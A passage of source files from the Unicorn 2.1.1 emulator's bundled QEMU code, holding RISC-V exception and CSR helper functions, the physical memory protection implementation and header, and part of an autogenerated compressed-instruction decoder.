Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" /* Exceptions processing helpers */ void QEMU_NORETURN riscv_raise_exception(CPURISCVState *env, uint32_t exception, uintptr_t pc) { CPUState *cs = env_cpu(env); qemu_log_mask(CPU_LOG_INT, "%s: %d\n", __func__, exception); cs->exception_index = exception; cpu_loop_exit_restore(cs, pc); } void helper_raise_exception(CPURISCVState *env, uint32_t exception) { riscv_raise_exception(env, exception, 0); } target_ulong helper_csrrw(CPURISCVState *env, target_ulong src, target_ulong csr) { target_ulong val = 0; if (riscv_csrrw(env, csr, &val, src, -1) < 0) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } return val; } target_ulong helper_csrrs(CPURISCVState *env, target_ulong src, target_ulong csr, target_ulong rs1_pass) { target_ulong val = 0; if (riscv_csrrw(env, csr, &val, -1, rs1_pass ? src : 0) < 0) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } return val; } target_ulong helper_csrrc(CPURISCVState *env, target_ulong src, target_ulong csr, target_ulong rs1_pass) { target_ulong val = 0; if (riscv_csrrw(env, csr, &val, 0, rs1_pass ? src : 0) < 0) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } return val; } target_ulong helper_sret(CPURISCVState *env, target_ulong cpu_pc_deb) { target_ulong prev_priv, prev_virt, mstatus; if (!(env->priv >= PRV_S)) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } target_ulong retpc = env->sepc; if (!riscv_has_ext(env, RVC) && (retpc & 0x3)) { riscv_raise_exception(env, RISCV_EXCP_INST_ADDR_MIS, GETPC()); } if (env->priv_ver >= PRIV_VERSION_1_10_0 && get_field(env->mstatus, MSTATUS_TSR) && !(env->priv >= PRV_M)) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } mstatus = env->mstatus; if (riscv_has_ext(env, RVH) && !riscv_cpu_virt_enabled(env)) { /* We support Hypervisor extensions and virtulisation is disabled */ target_ulong hstatus = env->hstatus; prev_priv = get_field(mstatus, MSTATUS_SPP); prev_virt = get_field(hstatus, HSTATUS_SPV); hstatus = set_field(hstatus, HSTATUS_SPV, get_field(hstatus, HSTATUS_SP2V)); mstatus = set_field(mstatus, MSTATUS_SPP, get_field(hstatus, HSTATUS_SP2P)); hstatus = set_field(hstatus, HSTATUS_SP2V, 0); hstatus = set_field(hstatus, HSTATUS_SP2P, 0); mstatus = set_field(mstatus, SSTATUS_SIE, get_field(mstatus, SSTATUS_SPIE)); mstatus = set_field(mstatus, SSTATUS_SPIE, 1); env->mstatus = mstatus; env->hstatus = hstatus; if (prev_virt) { riscv_cpu_swap_hypervisor_regs(env); } riscv_cpu_set_virt_enabled(env, prev_virt); } else { prev_priv = get_field(mstatus, MSTATUS_SPP); mstatus = set_field(mstatus, env->priv_ver >= PRIV_VERSION_1_10_0 ? MSTATUS_SIE : MSTATUS_UIE << prev_priv, get_field(mstatus, MSTATUS_SPIE)); mstatus = set_field(mstatus, MSTATUS_SPIE, 1); mstatus = set_field(mstatus, MSTATUS_SPP, PRV_U); env->mstatus = mstatus; } riscv_cpu_set_mode(env, prev_priv); return retpc; } target_ulong helper_mret(CPURISCVState *env, target_ulong cpu_pc_deb) { if (!(env->priv >= PRV_M)) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } target_ulong retpc = env->mepc; if (!riscv_has_ext(env, RVC) && (retpc & 0x3)) { riscv_raise_exception(env, RISCV_EXCP_INST_ADDR_MIS, GETPC()); } target_ulong mstatus = env->mstatus; target_ulong prev_priv = get_field(mstatus, MSTATUS_MPP); target_ulong prev_virt = MSTATUS_MPV_ISSET(env); mstatus = set_field(mstatus, env->priv_ver >= PRIV_VERSION_1_10_0 ? 
MSTATUS_MIE : MSTATUS_UIE << prev_priv, get_field(mstatus, MSTATUS_MPIE)); mstatus = set_field(mstatus, MSTATUS_MPIE, 1); mstatus = set_field(mstatus, MSTATUS_MPP, PRV_U); #ifdef TARGET_RISCV32 env->mstatush = set_field(env->mstatush, MSTATUS_MPV, 0); #else mstatus = set_field(mstatus, MSTATUS_MPV, 0); #endif env->mstatus = mstatus; riscv_cpu_set_mode(env, prev_priv); if (riscv_has_ext(env, RVH)) { if (prev_virt) { riscv_cpu_swap_hypervisor_regs(env); } riscv_cpu_set_virt_enabled(env, prev_virt); } return retpc; } void helper_wfi(CPURISCVState *env) { CPUState *cs = env_cpu(env); bool rvs = riscv_has_ext(env, RVS); bool prv_u = env->priv == PRV_U; bool prv_s = env->priv == PRV_S; if (((prv_s || (!rvs && prv_u)) && get_field(env->mstatus, MSTATUS_TW)) || (rvs && prv_u && !riscv_cpu_virt_enabled(env))) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } else if (riscv_cpu_virt_enabled(env) && (prv_u || (prv_s && get_field(env->hstatus, HSTATUS_VTW)))) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } else { cs->halted = 1; cs->exception_index = EXCP_HLT; cpu_loop_exit(cs); } } void helper_tlb_flush(CPURISCVState *env) { CPUState *cs = env_cpu(env); if (!(env->priv >= PRV_S) || (env->priv == PRV_S && env->priv_ver >= PRIV_VERSION_1_10_0 && get_field(env->mstatus, MSTATUS_TVM))) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } else { tlb_flush(cs); } } void helper_uc_riscv_exit(CPURISCVState *env) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_HLT; cs->halted = 1; cpu_loop_exit(cs); }�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/pmp.c���������������������������������������������������������������0000664�0000000�0000000�00000023417�14675241067�0017536�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU RISC-V PMP (Physical Memory Protection) * * Author: Daire McNamara, daire.mcnamara@emdalo.com * Ivan Griffin, ivan.griffin@emdalo.com * * This provides a RISC-V Physical Memory Protection implementation * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ /* * PMP (Physical Memory Protection) is as-of-yet unused and needs testing. 
*/ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" static void pmp_write_cfg(CPURISCVState *env, uint32_t addr_index, uint8_t val); static uint8_t pmp_read_cfg(CPURISCVState *env, uint32_t addr_index); static void pmp_update_rule(CPURISCVState *env, uint32_t pmp_index); /* * Accessor method to extract address matching type 'a field' from cfg reg */ static inline uint8_t pmp_get_a_field(uint8_t cfg) { uint8_t a = cfg >> 3; return a & 0x3; } /* * Check whether a PMP is locked or not. */ static inline int pmp_is_locked(CPURISCVState *env, uint32_t pmp_index) { if (env->pmp_state.pmp[pmp_index].cfg_reg & PMP_LOCK) { return 1; } /* Top PMP has no 'next' to check */ if ((pmp_index + 1u) >= MAX_RISCV_PMPS) { return 0; } /* In TOR mode, need to check the lock bit of the next pmp * (if there is a next) */ const uint8_t a_field = pmp_get_a_field(env->pmp_state.pmp[pmp_index + 1].cfg_reg); if ((env->pmp_state.pmp[pmp_index + 1u].cfg_reg & PMP_LOCK) && (PMP_AMATCH_TOR == a_field)) { return 1; } return 0; } /* * Count the number of active rules. */ static inline uint32_t pmp_get_num_rules(CPURISCVState *env) { return env->pmp_state.num_rules; } /* * Accessor to get the cfg reg for a specific PMP/HART */ static inline uint8_t pmp_read_cfg(CPURISCVState *env, uint32_t pmp_index) { if (pmp_index < MAX_RISCV_PMPS) { return env->pmp_state.pmp[pmp_index].cfg_reg; } return 0; } /* * Accessor to set the cfg reg for a specific PMP/HART * Bounds checks and relevant lock bit. */ static void pmp_write_cfg(CPURISCVState *env, uint32_t pmp_index, uint8_t val) { if (pmp_index < MAX_RISCV_PMPS) { if (!pmp_is_locked(env, pmp_index)) { env->pmp_state.pmp[pmp_index].cfg_reg = val; pmp_update_rule(env, pmp_index); } else { qemu_log_mask(LOG_GUEST_ERROR, "ignoring pmpcfg write - locked\n"); } } else { qemu_log_mask(LOG_GUEST_ERROR, "ignoring pmpcfg write - out of bounds\n"); } } static void pmp_decode_napot(target_ulong a, target_ulong *sa, target_ulong *ea) { /* aaaa...aaa0 8-byte NAPOT range aaaa...aa01 16-byte NAPOT range aaaa...a011 32-byte NAPOT range ... aa01...1111 2^XLEN-byte NAPOT range a011...1111 2^(XLEN+1)-byte NAPOT range 0111...1111 2^(XLEN+2)-byte NAPOT range 1111...1111 Reserved */ if (a == -1) { *sa = 0u; *ea = -1; return; } else { target_ulong t1 = ctz64(~a); target_ulong base = (a & ~(((target_ulong)1 << t1) - 1)) << 2; target_ulong range = ((target_ulong)1 << (t1 + 3)) - 1; *sa = base; *ea = base + range; } } /* Convert cfg/addr reg values here into simple 'sa' --> start address and 'ea' * end address values. 
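 * (Worked NAPOT example: pmpaddr = 0b0101 gives t1 = ctz(~a) = 1 in
 * pmp_decode_napot() above, so base = (a & ~1) << 2 = 16 and
 * range = 2^(1+3) - 1 = 15, i.e. the 16-byte region [16, 31].)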
* This function is called relatively infrequently whereas the check that * an address is within a pmp rule is called often, so optimise that one */ static void pmp_update_rule(CPURISCVState *env, uint32_t pmp_index) { int i; env->pmp_state.num_rules = 0; uint8_t this_cfg = env->pmp_state.pmp[pmp_index].cfg_reg; target_ulong this_addr = env->pmp_state.pmp[pmp_index].addr_reg; target_ulong prev_addr = 0u; target_ulong sa = 0u; target_ulong ea = 0u; if (pmp_index >= 1u) { prev_addr = env->pmp_state.pmp[pmp_index - 1].addr_reg; } switch (pmp_get_a_field(this_cfg)) { case PMP_AMATCH_OFF: sa = 0u; ea = -1; break; case PMP_AMATCH_TOR: sa = prev_addr << 2; /* shift up from [xx:0] to [xx+2:2] */ ea = (this_addr << 2) - 1u; break; case PMP_AMATCH_NA4: sa = this_addr << 2; /* shift up from [xx:0] to [xx+2:2] */ ea = (this_addr + 4u) - 1u; break; case PMP_AMATCH_NAPOT: pmp_decode_napot(this_addr, &sa, &ea); break; default: sa = 0u; ea = 0u; break; } env->pmp_state.addr[pmp_index].sa = sa; env->pmp_state.addr[pmp_index].ea = ea; for (i = 0; i < MAX_RISCV_PMPS; i++) { const uint8_t a_field = pmp_get_a_field(env->pmp_state.pmp[i].cfg_reg); if (PMP_AMATCH_OFF != a_field) { env->pmp_state.num_rules++; } } } static int pmp_is_in_range(CPURISCVState *env, int pmp_index, target_ulong addr) { int result = 0; if ((addr >= env->pmp_state.addr[pmp_index].sa) && (addr <= env->pmp_state.addr[pmp_index].ea)) { result = 1; } else { result = 0; } return result; } /* * Public Interface */ /* * Check if the address has required RWX privs to complete desired operation */ bool pmp_hart_has_privs(CPURISCVState *env, target_ulong addr, target_ulong size, pmp_priv_t privs, target_ulong mode) { int i = 0; int ret = -1; int pmp_size = 0; target_ulong s = 0; target_ulong e = 0; pmp_priv_t allowed_privs = 0; /* Short cut if no rules */ if (0 == pmp_get_num_rules(env)) { return true; } /* * if size is unknown (0), assume that all bytes * from addr to the end of the page will be accessed. */ if (size == 0) { #ifdef _MSC_VER pmp_size = 0 - (addr | TARGET_PAGE_MASK); #else pmp_size = -(addr | TARGET_PAGE_MASK); #endif } else { pmp_size = size; } /* 1.10 draft priv spec states there is an implicit order from low to high */ for (i = 0; i < MAX_RISCV_PMPS; i++) { s = pmp_is_in_range(env, i, addr); e = pmp_is_in_range(env, i, addr + pmp_size - 1); /* partially inside */ if ((s + e) == 1) { qemu_log_mask(LOG_GUEST_ERROR, "pmp violation - access is partially inside\n"); ret = 0; break; } /* fully inside */ const uint8_t a_field = pmp_get_a_field(env->pmp_state.pmp[i].cfg_reg); /* * If the PMP entry is not off and the address is in range, do the priv * check */ if (((s + e) == 2) && (PMP_AMATCH_OFF != a_field)) { allowed_privs = PMP_READ | PMP_WRITE | PMP_EXEC; if ((mode != PRV_M) || pmp_is_locked(env, i)) { allowed_privs &= env->pmp_state.pmp[i].cfg_reg; } if ((privs & allowed_privs) == privs) { ret = 1; break; } else { ret = 0; break; } } } /* No rule matched */ if (ret == -1) { if (mode == PRV_M) { ret = 1; /* Privileged spec v1.10 states if no PMP entry matches an * M-Mode access, the access succeeds */ } else { ret = 0; /* Other modes are not allowed to succeed if they don't * match a rule, but there are rules. We've checked for * no rule earlier in this function. */ } } return ret == 1 ? 
/*
 * Handle a write to a pmpcfg CSR
 */
void pmpcfg_csr_write(CPURISCVState *env, uint32_t reg_index,
                      target_ulong val)
{
    int i;
    uint8_t cfg_val;

    if ((reg_index & 1) && (sizeof(target_ulong) == 8)) {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "ignoring pmpcfg write - incorrect address\n");
        return;
    }

    for (i = 0; i < sizeof(target_ulong); i++) {
        cfg_val = (val >> 8 * i) & 0xff;
        pmp_write_cfg(env, (reg_index * sizeof(target_ulong)) + i, cfg_val);
    }
}

/*
 * Handle a read from a pmpcfg CSR
 */
target_ulong pmpcfg_csr_read(CPURISCVState *env, uint32_t reg_index)
{
    int i;
    target_ulong cfg_val = 0;
    target_ulong val = 0;

    for (i = 0; i < sizeof(target_ulong); i++) {
        val = pmp_read_cfg(env, (reg_index * sizeof(target_ulong)) + i);
        cfg_val |= (val << (i * 8));
    }

    return cfg_val;
}

/*
 * Handle a write to a pmpaddr CSR
 */
void pmpaddr_csr_write(CPURISCVState *env, uint32_t addr_index,
                       target_ulong val)
{
    if (addr_index < MAX_RISCV_PMPS) {
        if (!pmp_is_locked(env, addr_index)) {
            env->pmp_state.pmp[addr_index].addr_reg = val;
            pmp_update_rule(env, addr_index);
        } else {
            qemu_log_mask(LOG_GUEST_ERROR,
                          "ignoring pmpaddr write - locked\n");
        }
    } else {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "ignoring pmpaddr write - out of bounds\n");
    }
}

/*
 * Handle a read from a pmpaddr CSR
 */
target_ulong pmpaddr_csr_read(CPURISCVState *env, uint32_t addr_index)
{
    target_ulong val = 0;

    if (addr_index < MAX_RISCV_PMPS) {
        val = env->pmp_state.pmp[addr_index].addr_reg;
    } else {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "ignoring pmpaddr read - out of bounds\n");
    }

    return val;
}
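/*
 * A minimal sketch (editor's illustration, not part of QEMU): programming
 * entry 0 as a TOR rule over [0x0, 0x1000) with read-only permission and
 * querying it.  PRV_U is assumed to be the U-mode constant from cpu.h, and
 * the hypothetical guard keeps the sketch out of real builds.
 */
#ifdef PMP_USAGE_EXAMPLE /* hypothetical guard, never defined */
static bool pmp_usage_example(CPURISCVState *env)
{
    /* pmpaddr0 holds address[XLEN+1:2], so 0x1000 >> 2 is the TOR bound */
    pmpaddr_csr_write(env, 0, 0x1000 >> 2);
    /* A field = TOR in cfg bits [4:3], plus the R permission bit */
    pmpcfg_csr_write(env, 0, (PMP_AMATCH_TOR << 3) | PMP_READ);

    /* A 4-byte U-mode read at 0x100 is allowed ... */
    bool can_read = pmp_hart_has_privs(env, 0x100, 4, PMP_READ, PRV_U);
    /* ... but a write to the same address is rejected */
    bool can_write = pmp_hart_has_privs(env, 0x100, 4, PMP_WRITE, PRV_U);

    return can_read && !can_write;
}
#endif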
unicorn-2.1.1/qemu/target/riscv/pmp.h

/*
 * QEMU RISC-V PMP (Physical Memory Protection)
 *
 * Author: Daire McNamara, daire.mcnamara@emdalo.com
 *         Ivan Griffin, ivan.griffin@emdalo.com
 *
 * This provides a RISC-V Physical Memory Protection interface
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms and conditions of the GNU General Public License,
 * version 2 or later, as published by the Free Software Foundation.
 *
 * This program is distributed in the hope it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
 * more details.
 *
 * You should have received a copy of the GNU General Public License along with
 * this program. If not, see <http://www.gnu.org/licenses/>.
 */

#ifndef RISCV_PMP_H
#define RISCV_PMP_H

typedef enum {
    PMP_READ  = 1 << 0,
    PMP_WRITE = 1 << 1,
    PMP_EXEC  = 1 << 2,
    PMP_LOCK  = 1 << 7
} pmp_priv_t;

typedef enum {
    PMP_AMATCH_OFF,  /* Null (off)                            */
    PMP_AMATCH_TOR,  /* Top of Range                          */
    PMP_AMATCH_NA4,  /* Naturally aligned four-byte region    */
    PMP_AMATCH_NAPOT /* Naturally aligned power-of-two region */
} pmp_am_t;

typedef struct {
    target_ulong addr_reg;
    uint8_t cfg_reg;
} pmp_entry_t;

typedef struct {
    target_ulong sa;
    target_ulong ea;
} pmp_addr_t;

typedef struct {
    pmp_entry_t pmp[MAX_RISCV_PMPS];
    pmp_addr_t addr[MAX_RISCV_PMPS];
    uint32_t num_rules;
} pmp_table_t;

void pmpcfg_csr_write(CPURISCVState *env, uint32_t reg_index,
                      target_ulong val);
target_ulong pmpcfg_csr_read(CPURISCVState *env, uint32_t reg_index);
void pmpaddr_csr_write(CPURISCVState *env, uint32_t addr_index,
                       target_ulong val);
target_ulong pmpaddr_csr_read(CPURISCVState *env, uint32_t addr_index);
bool pmp_hart_has_privs(CPURISCVState *env, target_ulong addr,
                        target_ulong size, pmp_priv_t priv,
                        target_ulong mode);

#endif

unicorn-2.1.1/qemu/target/riscv/riscv32/

unicorn-2.1.1/qemu/target/riscv/riscv32/decode_insn16.inc.c

/* This file is autogenerated by scripts/decodetree.py.
*/ #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic push # pragma GCC diagnostic ignored "-Wredundant-decls" # ifdef __clang__ # pragma GCC diagnostic ignored "-Wtypedef-redefinition" # endif #endif typedef arg_empty arg_illegal; static bool trans_illegal(DisasContext *ctx, arg_illegal *a); typedef arg_i arg_addi; static bool trans_addi(DisasContext *ctx, arg_addi *a); typedef arg_i arg_fld; static bool trans_fld(DisasContext *ctx, arg_fld *a); typedef arg_i arg_lw; static bool trans_lw(DisasContext *ctx, arg_lw *a); typedef arg_s arg_fsd; static bool trans_fsd(DisasContext *ctx, arg_fsd *a); typedef arg_s arg_sw; static bool trans_sw(DisasContext *ctx, arg_sw *a); typedef arg_u arg_lui; static bool trans_lui(DisasContext *ctx, arg_lui *a); typedef arg_shift arg_srli; static bool trans_srli(DisasContext *ctx, arg_srli *a); typedef arg_shift arg_srai; static bool trans_srai(DisasContext *ctx, arg_srai *a); typedef arg_i arg_andi; static bool trans_andi(DisasContext *ctx, arg_andi *a); typedef arg_r arg_sub; static bool trans_sub(DisasContext *ctx, arg_sub *a); typedef arg_r arg_xor; static bool trans_xor(DisasContext *ctx, arg_xor *a); typedef arg_r arg_or; static bool trans_or(DisasContext *ctx, arg_or *a); typedef arg_r arg_and; static bool trans_and(DisasContext *ctx, arg_and *a); typedef arg_j arg_jal; static bool trans_jal(DisasContext *ctx, arg_jal *a); typedef arg_b arg_beq; static bool trans_beq(DisasContext *ctx, arg_beq *a); typedef arg_b arg_bne; static bool trans_bne(DisasContext *ctx, arg_bne *a); typedef arg_shift arg_slli; static bool trans_slli(DisasContext *ctx, arg_slli *a); typedef arg_i arg_jalr; static bool trans_jalr(DisasContext *ctx, arg_jalr *a); typedef arg_empty arg_ebreak; static bool trans_ebreak(DisasContext *ctx, arg_ebreak *a); typedef arg_r arg_add; static bool trans_add(DisasContext *ctx, arg_add *a); typedef arg_i arg_flw; static bool trans_flw(DisasContext *ctx, arg_flw *a); typedef arg_s arg_fsw; static bool trans_fsw(DisasContext *ctx, arg_fsw *a); #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic pop #endif static void decode_insn16_extract_c_addi16sp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_4(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 2, 1)), 2, 30, extract32(insn, 5, 1)), 3, 29, extract32(insn, 3, 2)), 5, 27, sextract32(insn, 12, 1))); a->rs1 = 2; a->rd = 2; } static void decode_insn16_extract_c_addi4spn(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 5, 1)), 2, 30, extract32(insn, 11, 2)), 4, 28, extract32(insn, 7, 4))); a->rs1 = 2; a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_c_andi(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); } static void decode_insn16_extract_c_jalr(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = 0; a->rs1 = extract32(insn, 7, 5); } static void decode_insn16_extract_c_ldsp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(deposit32(extract32(insn, 5, 2), 2, 30, extract32(insn, 12, 1)), 3, 29, extract32(insn, 2, 3))); a->rs1 = 2; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_li(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = 
deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = 0; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_lui(DisasContext *ctx, arg_u *a, uint16_t insn) { a->imm = ex_shift_12(ctx, deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1))); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_lwsp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 4, 3), 3, 29, extract32(insn, 12, 1)), 4, 28, extract32(insn, 2, 2))); a->rs1 = 2; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_mv(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = 0; a->rs1 = extract32(insn, 2, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_sdsp(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 7, 3))); a->rs1 = 2; a->rs2 = extract32(insn, 2, 5); } static void decode_insn16_extract_c_shift(DisasContext *ctx, arg_shift *a, uint16_t insn) { a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->shamt = ex_rvc_shifti(ctx, deposit32(extract32(insn, 2, 5), 5, 27, extract32(insn, 12, 1))); } static void decode_insn16_extract_c_shift2(DisasContext *ctx, arg_shift *a, uint16_t insn) { a->rd = extract32(insn, 7, 5); a->rs1 = extract32(insn, 7, 5); a->shamt = ex_rvc_shifti(ctx, deposit32(extract32(insn, 2, 5), 5, 27, extract32(insn, 12, 1))); } static void decode_insn16_extract_c_swsp(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(extract32(insn, 9, 4), 4, 28, extract32(insn, 7, 2))); a->rs1 = 2; a->rs2 = extract32(insn, 2, 5); } static void decode_insn16_extract_cb_z(DisasContext *ctx, arg_b *a, uint16_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 3, 2), 2, 30, extract32(insn, 10, 2)), 4, 28, extract32(insn, 2, 1)), 5, 27, extract32(insn, 5, 2)), 7, 25, sextract32(insn, 12, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = 0; } static void decode_insn16_extract_ci(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = extract32(insn, 7, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_cj(DisasContext *ctx, arg_j *a, uint16_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(deposit32(deposit32(deposit32(deposit32(extract32(insn, 3, 3), 3, 29, extract32(insn, 11, 1)), 4, 28, extract32(insn, 2, 1)), 5, 27, extract32(insn, 7, 1)), 6, 26, extract32(insn, 6, 1)), 7, 25, extract32(insn, 9, 2)), 9, 23, extract32(insn, 8, 1)), 10, 22, sextract32(insn, 12, 1))); } static void decode_insn16_extract_cl_d(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 5, 2))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cl_w(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 10, 3)), 4, 28, extract32(insn, 5, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cr(DisasContext *ctx, arg_r *a, uint16_t insn) { a->rs2 = extract32(insn, 2, 5); a->rs1 = extract32(insn, 7, 5); a->rd = extract32(insn, 7, 5); } 
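/*
 * A worked example (editor's illustration, not emitted by decodetree.py):
 * c.addi a0, 1 assembles to insn = 0x0505.  insn & 0xe003 == 0x0001, so the
 * decode switch below uses decode_insn16_extract_ci() above, which composes
 * imm = deposit32(extract32(0x0505, 2, 5), 5, 27, sextract32(0x0505, 12, 1))
 *     = 1
 * and rs1 = rd = extract32(0x0505, 7, 5) = 10 (a0), then dispatches to
 * trans_addi() exactly as for the 32-bit addi.
 */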
static void decode_insn16_extract_cs_2(DisasContext *ctx, arg_r *a, uint16_t insn) { a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); } static void decode_insn16_extract_cs_d(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 5, 2))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cs_w(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 10, 3)), 4, 28, extract32(insn, 5, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_decode_insn16_Fmt_22(DisasContext *ctx, arg_empty *a, uint16_t insn) { } static bool decode_insn16(DisasContext *ctx, uint16_t insn) { union { arg_b f_b; arg_empty f_empty; arg_i f_i; arg_j f_j; arg_r f_r; arg_s f_s; arg_shift f_shift; arg_u f_u; } u; switch (insn & 0x0000e003) { case 0x00000000: /* 000..... ......00 */ if ((insn & 0x00001fe0) == 0x00000000) { /* 00000000 000...00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:87 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); ctx->invalid = true; if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:88 */ decode_insn16_extract_c_addi4spn(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00000001: /* 000..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:96 */ decode_insn16_extract_ci(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00000002: /* 000..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:115 */ decode_insn16_extract_c_shift2(ctx, &u.f_shift, insn); if (trans_slli(ctx, &u.f_shift)) return true; return false; case 0x00002000: /* 001..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:90 */ decode_insn16_extract_cl_d(ctx, &u.f_i, insn); if (trans_fld(ctx, &u.f_i)) return true; return false; case 0x00002001: /* 001..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-32.decode:24 */ decode_insn16_extract_cj(ctx, &u.f_j, insn); u.f_j.rd = 1; if (trans_jal(ctx, &u.f_j)) return true; return false; case 0x00002002: /* 001..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:116 */ decode_insn16_extract_c_ldsp(ctx, &u.f_i, insn); if (trans_fld(ctx, &u.f_i)) return true; return false; case 0x00004000: /* 010..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:91 */ decode_insn16_extract_cl_w(ctx, &u.f_i, insn); if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x00004001: /* 010..... ......01 */ 